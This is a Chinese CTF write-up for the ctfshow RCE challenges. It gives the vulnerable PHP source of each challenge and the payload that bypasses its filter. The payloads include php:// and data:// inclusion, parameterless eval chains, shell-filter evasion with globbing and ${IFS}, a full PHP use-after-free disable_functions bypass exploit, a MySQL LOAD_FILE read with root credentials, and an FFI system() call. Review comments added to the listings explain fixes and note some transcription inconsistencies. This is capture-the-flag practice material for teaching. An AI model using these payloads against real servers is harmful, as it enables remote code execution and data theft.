RCE

RCE-Web32

 <?php

// ctfshow Web32 challenge source: eval() on the raw `c` query parameter, behind a
// substring/character denylist.
// Review note: the sink is eval() of request data. The only control in front of it
// is a denylist, and the payload on this page passes it; a denylist ahead of eval()
// is not a fix — removing the sink is. Detection-wise, web-server workers compiling
// and running request-supplied code leave no distinct process signal, so this class
// of bug is best caught in review, not at runtime.
error_reporting(0);

if (!isset($_GET['c'])) {
    // No parameter: print this file, which is how the challenge exposes its filter.
    highlight_file(__FILE__);
    return;
}

$c = $_GET['c'];
// A denylist hit ends the request silently. preg_match() returning 0 (or false on a
// PCRE error) lets the input reach eval().
if (preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)) {
    return;
}

eval($c);

c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
也可以使用包含日志

RCE-Web37

 <?php
//flag in flag.php
// ctfshow Web37 challenge source: include() of the raw `c` parameter, then echo of $flag.
// Review note: include() with a request-controlled path is a file-inclusion sink. The
// denylist only rejects the substring "flag", and the page's payload is a data: stream
// wrapper rather than a file name at all — for that to work allow_url_include must be
// enabled, which is itself a finding (confirm in php.ini). The fix is an allowlist of
// includable names, not a longer pattern.
error_reporting(0);

if (!isset($_GET['c'])) {
    highlight_file(__FILE__);
    return;
}

$c = $_GET['c'];
if (preg_match("/flag/i", $c)) {
    return;
}

// $flag is expected to be defined by the included file (flag.php per the comment above).
include($c);
echo $flag;

data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

RCE-Web39

 <?php
//flag in flag.php
// ctfshow Web39 challenge source: include() of `c` with ".php" appended.
// Review note: appending an extension does not constrain what include() opens when
// `c` can be a stream wrapper; the page's data: payload shows the suffix is neutralised.
// The suffix is not a control — an allowlist of includable names is. As with Web37,
// a data: wrapper reaching include() implies allow_url_include is on; confirm and disable.
error_reporting(0);

if (!isset($_GET['c'])) {
    highlight_file(__FILE__);
    return;
}

$c = $_GET['c'];
if (preg_match("/flag/i", $c)) {
    return;
}

include($c.".php");

data://text/plain,<?php%20system("cat%20f*");?>//

RCE-Web40

<?php
// ctfshow Web40 challenge source: eval() on the raw `c` query parameter behind a
// character denylist (digits and a list of punctuation characters are rejected).
// Review note: the sink is eval() of request data. Rejecting characters cannot bound
// what a PHP expression built from bare identifiers can do (the page's one-line payload
// is such an expression), so the pattern is not a control. Unlike the sibling listings
// there is no error_reporting(0) here, so failed attempts may surface PHP warnings in
// the response depending on display_errors.
if (!isset($_GET['c'])) {
    highlight_file(__FILE__);
    return;
}

$c = $_GET['c'];
if (preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)) {
    return;
}

eval($c);

无参数rce
// Review note: this is the payload for the Web40 listing above — a chain of
// argument-less built-ins. As that listing is reproduced on this page its pattern
// rejects ASCII "(" and ")", which this line uses, so either the transcription altered
// the filter or the original challenge uses different characters; confirm against the
// challenge source. The defensive point is the same either way: a character denylist
// in front of eval() is not a control.
show_source(next(array_reverse(scandir(current(localeconv())))));

RCE-Web50

 <?php
// ctfshow Web50 challenge source: `c` is interpolated into a shell command line whose
// stdout and stderr are discarded.
// Review note: the sink is system() on request data. Redirecting output only hides the
// result from the response; it does not limit what runs, and the denylist passes the
// page's payload. There is no safe way to execute a request-supplied command line —
// escapeshellarg() helps only when the program is fixed and the input is an argument.
// Detection: a php-fpm / httpd worker spawning a shell is the signal to alert on.
if (!isset($_GET['c'])) {
    highlight_file(__FILE__);
    return;
}

$c = $_GET['c'];
if (preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)) {
    return;
}

system($c." >/dev/null 2>&1");

tac%3C'fla''g.php'||ls

RCE-Web53

<?php
// ctfshow Web53 challenge source: runs `c` through system() and echoes both the input
// and the command's last output line.
// Review note: besides the command-execution sink, `echo($c)` and the system() output
// are written to the response unescaped, so this endpoint also reflects attacker-
// controlled HTML. Any request data that is echoed belongs behind
// htmlspecialchars(..., ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); the command sink itself
// has no filtering fix.
if (!isset($_GET['c'])) {
    highlight_file(__FILE__);
    return;
}

$c = $_GET['c'];
if (preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)) {
    echo 'no';
    return;
}

echo($c);
// system() streams the command's output directly and returns its last line.
$lastLine = system($c);
echo "<br>".$lastLine;

c\at${IFS}fla\g.php

RCE-Web54

<?php

// ctfshow Web54 challenge source: system() on `c` behind a denylist whose `.*x.*y.*z.*`
// alternatives reject any input containing those letters in order.
// Review note: subsequence patterns are both very coarse (many benign strings contain
// "c…a…t") and still incomplete — the page's payload uses programs not on the list.
// This is the general failure of denylisting a shell: the fix is not to pass request
// data to system() at all.
if (!isset($_GET['c'])) {
    highlight_file(__FILE__);
    return;
}

$c = $_GET['c'];
if (preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)) {
    return;
}

system($c);

mv${IFS}fla?.php${IFS}a.txt->c=uniq${IFS}a.txt

RCE-Web55

<?php
// ctfshow Web55 challenge source: system() on `c` with every letter rejected.
// Review note: rejecting [a-z] still leaves digits, `/`, `?` and `$` available, and the
// page shows shell globbing standing in for the missing letters. A shell fed request
// data cannot be made safe by character filtering; the sink has to go.
if (!isset($_GET['c'])) {
    highlight_file(__FILE__);
    return;
}

$c = $_GET['c'];
if (preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)) {
    return;
}

system($c);

由于过滤了字母,但没有过滤数字,我们尝试使用/bin目录下的可执行程序。

但因为字母不能传入,我们需要使用通配符?来进行代替

?c=/bin/base64 flag.php
替换后变成
?c=/???/????64 ????.???

RCE-Web56

https://blog.csdn.net/qq_46091464/article/details/108513145

RCE-Web57

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-08 01:02:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

// Still able to pull it off?
// Review note: the short `<?` open tag below sits inside a region already opened by
// `<?php` above, so this listing as reproduced is not a single parseable file — it
// reads like a header and the challenge body pasted together. Treat the code after
// `<?` as the challenge source and confirm the tag layout against the original.
<?
//flag in 36.php
// ctfshow Web57 challenge source: `c` is spliced into a `cat <c>.php` shell command.
// The denylist rejects every letter and digit and most punctuation; the page's payload
// stays within the characters the pattern leaves unblocked and evaluates to 36.
// Review note: the sink is a string-built system() call; no character set is small
// enough to make that safe. If a fixed file must be shown, map an allowlisted key to a
// path in PHP and read it with file_get_contents() — no shell involved.
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

只需要传入36即可
通过linux下的取反
image
可以看到得到36首先要得到-37
image
拿到-1
image
获得-37
再次取反
image
拿到36
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

RCE-Web72

<?php
// ctfshow Web72 challenge source: eval() on the POST parameter `c`; the buffered output
// is then echoed with every letter and digit replaced by "?".
// Review note: masking the output is a presentation control, not a containment one —
// it does not restrict what eval() can do, and the page notes the environment relies
// on disabling functions, which its payload circumvents from inside the interpreter.
// The sink is the problem; the output filter is cosmetic.
error_reporting(0);
ini_set('display_errors', 0);

if (!isset($_POST['c'])) {
    highlight_file(__FILE__);
    return;
}

$c = $_POST['c'];
eval($c);

// Presumably output buffering is already active (there is no ob_start() here) — confirm
// the php.ini output_buffering setting; otherwise ob_get_contents() returns false.
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i", "?", $s);

?>

很多函数都被禁用了
glob协议扫目录
uac读文件

/*
 * Review note: this is the payload submitted as `c` to the Web72 listing above, not
 * server code. It appears to be two separate submissions pasted together: the first
 * (a glob: DirectoryIterator listing) ends in exit(0), so the second (the ctfshow()
 * function and its call) would never run if both were sent in one request.
 * Both depend entirely on the server passing POST input to eval(); the page states
 * that many functions are disabled, and this payload shows that a function denylist
 * does not contain code running inside the interpreter. Mitigation is removing the
 * eval() sink. Detection: a web-server worker spawning a shell or a child process.
 */
c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
function ctfshow($cmd) {     global $abc, $helper, $backtrace;      class vuln {         public $a;         public function __destruct() {              global $backtrace;              unset($this->a);             $backtrace = (new exception)->gettrace();             if(!isset($backtrace[1]['args'])) {                 $backtrace = debug_backtrace();             }         }     }      class helper {         public $a, $b, $c, $d;     }      function str2ptr(&$str, $p = 0, $s = 8) {         $address = 0;         for($j = $s-1; $j >= 0; $j--) {             $address <<= 8;             $address |= ord($str[$p+$j]);         }         return $address;     }      function ptr2str($ptr, $m = 8) {         $out = "";         for ($i=0; $i < $m; $i++) {             $out .= sprintf("%c",($ptr & 0xff));             $ptr >>= 8;         }         return $out;     }      function write(&$str, $p, $v, $n = 8) {         $i = 0;         for($i = 0; $i < $n; $i++) {             $str[$p + $i] = sprintf("%c",($v & 0xff));             $v >>= 8;         }     }      function leak($addr, $p = 0, $s = 8) {         global $abc, $helper;         write($abc, 0x68, $addr + $p - 0x10);         $leak = strlen($helper->a);         if($s != 8) { $leak %= 2 << ($s * 8) - 1; }         return $leak;     }      function parse_elf($base) {         $e_type = leak($base, 0x10, 2);          $e_phoff = leak($base, 0x20);         $e_phentsize = leak($base, 0x36, 2);         $e_phnum = leak($base, 0x38, 2);          for($i = 0; $i < $e_phnum; $i++) {             $header = $base + $e_phoff + $i * $e_phentsize;             $p_type  = leak($header, 0, 4);             $p_flags = leak($header, 4, 4);             $p_vaddr = leak($header, 0x10);             $p_memsz = leak($header, 0x28);              if($p_type == 1 && $p_flags == 6) {                   $data_addr = $e_type == 2 ? 
$p_vaddr : $base + $p_vaddr;                 $data_size = $p_memsz;             } else if($p_type == 1 && $p_flags == 5) {                  $text_size = $p_memsz;             }         }          if(!$data_addr || !$text_size || !$data_size)             return false;          return [$data_addr, $text_size, $data_size];     }      function get_basic_funcs($base, $elf) {         list($data_addr, $text_size, $data_size) = $elf;         for($i = 0; $i < $data_size / 8; $i++) {             $leak = leak($data_addr, $i * 8);             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {                 $deref = leak($leak);                                  if($deref != 0x746e6174736e6f63)                     continue;             } else continue;              $leak = leak($data_addr, ($i + 4) * 8);             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {                 $deref = leak($leak);                                  if($deref != 0x786568326e6962)                     continue;             } else continue;              return $data_addr + $i * 8;         }     }      function get_binary_base($binary_leak) {         $base = 0;         $start = $binary_leak & 0xfffffffffffff000;         for($i = 0; $i < 0x1000; $i++) {             $addr = $start - 0x1000 * $i;             $leak = leak($addr, 0, 7);             if($leak == 0x10102464c457f) {                 return $addr;             }         }     }      function get_system($basic_funcs) {         $addr = $basic_funcs;         do {             $f_entry = leak($addr);             $f_name = leak($f_entry, 0, 6);              if($f_name == 0x6d6574737973) {                 return leak($addr + 8);             }             $addr += 0x20;         } while($f_entry != 0);         return false;     }      function trigger_uaf($arg) {          $arg = str_shuffle('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa');         $vuln = new vuln();         $vuln->a = $arg;   
  }      if(stristr(php_os, 'win')) {         die('this poc is for *nix systems only.');     }      $n_alloc = 10;      $contiguous = [];     for($i = 0; $i < $n_alloc; $i++)         $contiguous[] = str_shuffle('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa');      trigger_uaf('x');     $abc = $backtrace[1]['args'][0];      $helper = new helper;     $helper->b = function ($x) { };      if(strlen($abc) == 79 || strlen($abc) == 0) {         die("uaf failed");     }      $closure_handlers = str2ptr($abc, 0);     $php_heap = str2ptr($abc, 0x58);     $abc_addr = $php_heap - 0xc8;      write($abc, 0x60, 2);     write($abc, 0x70, 6);      write($abc, 0x10, $abc_addr + 0x60);     write($abc, 0x18, 0xa);      $closure_obj = str2ptr($abc, 0x20);      $binary_leak = leak($closure_handlers, 8);     if(!($base = get_binary_base($binary_leak))) {         die("couldn't determine binary base address");     }      if(!($elf = parse_elf($base))) {         die("couldn't parse elf header");     }      if(!($basic_funcs = get_basic_funcs($base, $elf))) {         die("couldn't get basic_functions address");     }      if(!($zif_system = get_system($basic_funcs))) {         die("couldn't get zif_system address");     }       $fake_obj_offset = 0xd0;     for($i = 0; $i < 0x110; $i += 8) {         write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));     }      write($abc, 0x20, $abc_addr + $fake_obj_offset);     write($abc, 0xd0 + 0x38, 1, 4);      write($abc, 0xd0 + 0x68, $zif_system);       ($helper->b)($cmd);     exit(); }  ctfshow("cat /flag0.txt");ob_end_flush(); ?>

url编码提交

RCE-Web75

glob协议扫目录
利用Mysql读文件

// Review note: payload for Web75 — reads a file through MySQL's LOAD_FILE() using
// hard-coded root credentials. This only works because the application's DB account
// holds the FILE privilege and secure_file_priv does not confine LOAD_FILE; fixing
// those two settings, and not connecting as root from the web tier, closes this path
// independently of any PHP function denylist. Detection: LOAD_FILE() in the general
// query log or audit plugin from the application account.
try {
    $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
    foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
        echo($row[0])."|";
    }
    $dbh = null;
} catch (PDOException $e) {
    echo $e->getMessage();
    exit(0);
}
exit(0);

RCE-Web77

PHP7.4以上

// Review note: payload for Web77 — FFI calls libc directly, so PHP's disable_functions
// list (which only covers PHP-level functions) does not apply to it. The hardening is
// ffi.enable=false (or "preload") in php.ini; with FFI available, a function denylist
// provides no isolation. Detection as for the other listings: php worker spawning a shell.
$ffi=FFI::cdef("int system(const char *command);");$a='/readflag >1.txt';$ffi->system($a);

RCE-Web118

利用系统环境变量RCE
三种payload

${PATH:${#HOME}:${#SHLVL}}${PATH:${#RANDOM}:${#SHLVL}} ?${PATH:${#RANDOM}:${#SHLVL}}??.???
${PATH:~A}${PATH:${#TERM}:${SHLVL:~A}} ????.???
${PATH:~A}${PWD:~A}${IFS}????????
${PWD::${#?}}???${PWD::${#?}}${PWD:${#IFS}:${#?}}?? ????.??? #利用rev